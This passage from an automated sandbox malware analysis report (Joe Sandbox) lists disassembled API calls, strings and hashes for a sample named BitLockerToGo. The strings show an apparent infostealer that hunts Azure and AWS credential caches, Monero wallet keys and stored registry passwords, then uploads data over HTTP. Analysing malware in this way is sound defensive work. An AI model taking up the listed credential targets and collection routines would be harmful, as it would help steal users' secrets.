                                                                                                                                                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 02764EE5
                                                                                                                                                        • Part of subcall function 02764910: wsprintfA.USER32 ref: 027649B0
                                                                                                                                                        • Part of subcall function 02764910: StrCmpCA.SHLWAPI(?,027708D2), ref: 027649C5
                                                                                                                                                        • Part of subcall function 02764910: wsprintfA.USER32 ref: 027649E2
                                                                                                                                                        • Part of subcall function 02764910: PathMatchSpecA.SHLWAPI(?,?), ref: 02764A1E
                                                                                                                                                        • Part of subcall function 02764910: lstrcat.KERNEL32(?,029E4B48), ref: 02764A4A
                                                                                                                                                        • Part of subcall function 02764910: lstrcat.KERNEL32(?,02770FF8), ref: 02764A5C
                                                                                                                                                        • Part of subcall function 02764910: lstrcat.KERNEL32(?,?), ref: 02764A70
                                                                                                                                                        • Part of subcall function 02764910: lstrcat.KERNEL32(?,02770FFC), ref: 02764A82
                                                                                                                                                        • Part of subcall function 02764910: lstrcat.KERNEL32(?,?), ref: 02764A96
                                                                                                                                                        • Part of subcall function 02764910: CopyFileA.KERNEL32(?,?,00000001), ref: 02764AAC
                                                                                                                                                        • Part of subcall function 02764910: DeleteFileA.KERNEL32(?), ref: 02764B31
                                                                                                                                                      • memset.MSVCRT ref: 02764F2B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                      • API String ID: 4017274736-974132213
                                                                                                                                                      • Opcode ID: 384915a6bfe26af6c1a32566c55a547ec5e23b6f7a4fb51315701b064f6590a2
                                                                                                                                                      • Instruction ID: e84adf851cc358b66c91000e6649acfa696dc3152cb9f104513489b7c2e8abdd
                                                                                                                                                      • Opcode Fuzzy Hash: 384915a6bfe26af6c1a32566c55a547ec5e23b6f7a4fb51315701b064f6590a2
                                                                                                                                                      • Instruction Fuzzy Hash: 0441C6B594031467EB15F770DC4EFED7739AB14700F404894BA4AA6080EEB49B99CFA2
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                        • Part of subcall function 027547B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 027547EA
                                                                                                                                                        • Part of subcall function 027547B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02754801
                                                                                                                                                        • Part of subcall function 027547B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02754818
                                                                                                                                                        • Part of subcall function 027547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02754839
                                                                                                                                                        • Part of subcall function 027547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 02754849
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02754915
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,029E4B88), ref: 0275493A
                                                                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02754ABA
                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,02770DDB,00000000,?,?,00000000,?,",00000000,?,029E4CA8), ref: 02754DE8
                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02754E04
                                                                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02754E18
                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02754E49
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 02754EAD
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 02754EC5
                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,029E4CC8,?,029E5F38,00000000,00000000,00400100,00000000), ref: 02754B15
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 02754ECF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                      • String ID: "$"$------$------$------
                                                                                                                                                      • API String ID: 2402878923-2180234286
                                                                                                                                                      • Opcode ID: f13af41c43e85e601160fce43782e634ee98cd02e5e9eb6c828ff1ae0d071628
                                                                                                                                                      • Instruction ID: 7ba851919484668b4bc4415554ab7044787d7bc0f5ee97bffdb7e7e2d7bbcc58
                                                                                                                                                      • Opcode Fuzzy Hash: f13af41c43e85e601160fce43782e634ee98cd02e5e9eb6c828ff1ae0d071628
                                                                                                                                                      • Instruction Fuzzy Hash: 3612E071910219AADB16EB50DDADFFEB77ABF14300F5041A9A90672490EF702F49CFA4
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                      • RegOpenKeyExA.KERNEL32(00000000,029E30F8,00000000,00020019,00000000,027705B6), ref: 027683A4
                                                                                                                                                      • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 02768426
                                                                                                                                                      • wsprintfA.USER32 ref: 02768459
                                                                                                                                                      • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0276847B
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0276848C
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 02768499
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                                                                      • String ID: - $%s\%s$?
                                                                                                                                                      • API String ID: 3246050789-3278919252
                                                                                                                                                      • Opcode ID: 99ce00f7fbd6b7568b18a69e1bb43b88aed426a39e82b62fbb003104cc2563ba
                                                                                                                                                      • Instruction ID: 650dd176cb1e14e088d68efefc9e7c3a38d83895e713980152b0e798f82a45c8
                                                                                                                                                      • Opcode Fuzzy Hash: 99ce00f7fbd6b7568b18a69e1bb43b88aed426a39e82b62fbb003104cc2563ba
                                                                                                                                                      • Instruction Fuzzy Hash: 91811AB1910218ABEB25DB54CD99FFAB7B9FF08710F008698E509A6140DF716B89CFD0
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A820: lstrlen.KERNEL32(00000000,?,?,02765B54,02770ADB,02770ADA,?,?,02766B16,00000000,?,029D0578,?,0277110C,?,00000000), ref: 0276A82B
                                                                                                                                                        • Part of subcall function 0276A820: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A885
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 02765644
                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 027656A1
                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 02765857
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                        • Part of subcall function 027651F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 02765228
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                        • Part of subcall function 027652C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 02765318
                                                                                                                                                        • Part of subcall function 027652C0: lstrlen.KERNEL32(00000000), ref: 0276532F
                                                                                                                                                        • Part of subcall function 027652C0: StrStrA.SHLWAPI(00000000,00000000), ref: 02765364
                                                                                                                                                        • Part of subcall function 027652C0: lstrlen.KERNEL32(00000000), ref: 02765383
                                                                                                                                                        • Part of subcall function 027652C0: strtok.MSVCRT(00000000,?), ref: 0276539E
                                                                                                                                                        • Part of subcall function 027652C0: lstrlen.KERNEL32(00000000), ref: 027653AE
                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0276578B
                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 02765940
                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 02765A0C
                                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 02765A1B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcpylstrlen$Sleepstrtok
                                                                                                                                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                      • API String ID: 3630751533-2791005934
                                                                                                                                                      • Opcode ID: 99ac1b2a46ca4b19aaf8ffcbcb0cfe8408b113731c2ee8a3b23afbeb55528fec
                                                                                                                                                      • Instruction ID: 67d9966a91326060664ee600b64348f3db4d61798e350b54bc101b96c68f3743
                                                                                                                                                      • Opcode Fuzzy Hash: 99ac1b2a46ca4b19aaf8ffcbcb0cfe8408b113731c2ee8a3b23afbeb55528fec
                                                                                                                                                      • Instruction Fuzzy Hash: 14E13E71910105AADB16FBA4DC9EAFD737AAF54300F808528AD0676590EF346A19CFE1
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 02751327
                                                                                                                                                        • Part of subcall function 027512A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 027512B4
                                                                                                                                                        • Part of subcall function 027512A0: RtlAllocateHeap.NTDLL(00000000), ref: 027512BB
                                                                                                                                                        • Part of subcall function 027512A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 027512D7
                                                                                                                                                        • Part of subcall function 027512A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 027512F5
                                                                                                                                                        • Part of subcall function 027512A0: RegCloseKey.ADVAPI32(?), ref: 027512FF
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0275134F
                                                                                                                                                      • lstrlen.KERNEL32(?), ref: 0275135C
                                                                                                                                                      • lstrcat.KERNEL32(?,.keys), ref: 02751377
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                        • Part of subcall function 02768B60: GetSystemTime.KERNEL32(?,029D9928,027705AE,?,?,?,?,?,?,?,?,?,02754963,?,00000014), ref: 02768B86
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 02751465
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                        • Part of subcall function 027599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 027599EC
                                                                                                                                                        • Part of subcall function 027599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02759A11
                                                                                                                                                        • Part of subcall function 027599C0: LocalAlloc.KERNEL32(00000040,?), ref: 02759A31
                                                                                                                                                        • Part of subcall function 027599C0: ReadFile.KERNEL32(000000FF,?,00000000,027602E7,00000000), ref: 02759A5A
                                                                                                                                                        • Part of subcall function 027599C0: LocalFree.KERNEL32(027602E7), ref: 02759A90
                                                                                                                                                        • Part of subcall function 027599C0: CloseHandle.KERNEL32(000000FF), ref: 02759A9A
                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 027514EF
                                                                                                                                                      • memset.MSVCRT ref: 02751516
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                                                                                                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                      • API String ID: 3885987321-218353709
                                                                                                                                                      • Opcode ID: cb737d0f76f19a8eb7040aabf0552544ff8678284be2078198e12fa8e1fa2a9a
                                                                                                                                                      • Instruction ID: f291a7ab329d791f9d6810d920f9504fa8a6362e7b9a807910e92ab8ce27607d
                                                                                                                                                      • Opcode Fuzzy Hash: cb737d0f76f19a8eb7040aabf0552544ff8678284be2078198e12fa8e1fa2a9a
                                                                                                                                                      • Instruction Fuzzy Hash: 305111B1D5021997DB16FB60DD99FFD737DAB54300F4045A8AA0A72080EE706B89CFA5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 027572D0: memset.MSVCRT ref: 02757314
                                                                                                                                                        • Part of subcall function 027572D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,02757C90), ref: 0275733A
                                                                                                                                                        • Part of subcall function 027572D0: RegEnumValueA.ADVAPI32(02757C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 027573B1
                                                                                                                                                        • Part of subcall function 027572D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0275740D
                                                                                                                                                        • Part of subcall function 027572D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,02757C90,80000001,027661C4,?,?,?,?,?,02757C90,?), ref: 02757452
                                                                                                                                                        • Part of subcall function 027572D0: HeapFree.KERNEL32(00000000,?,?,?,?,02757C90,80000001,027661C4,?,?,?,?,?,02757C90,?), ref: 02757459
                                                                                                                                                      • lstrcat.KERNEL32(2EE56020,027717FC), ref: 02757606
                                                                                                                                                      • lstrcat.KERNEL32(2EE56020,00000000), ref: 02757648
                                                                                                                                                      • lstrcat.KERNEL32(2EE56020, : ), ref: 0275765A
                                                                                                                                                      • lstrcat.KERNEL32(2EE56020,00000000), ref: 0275768F
                                                                                                                                                      • lstrcat.KERNEL32(2EE56020,02771804), ref: 027576A0
                                                                                                                                                      • lstrcat.KERNEL32(2EE56020,00000000), ref: 027576D3
                                                                                                                                                      • lstrcat.KERNEL32(2EE56020,02771808), ref: 027576ED
                                                                                                                                                      • task.LIBCPMTD ref: 027576FB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
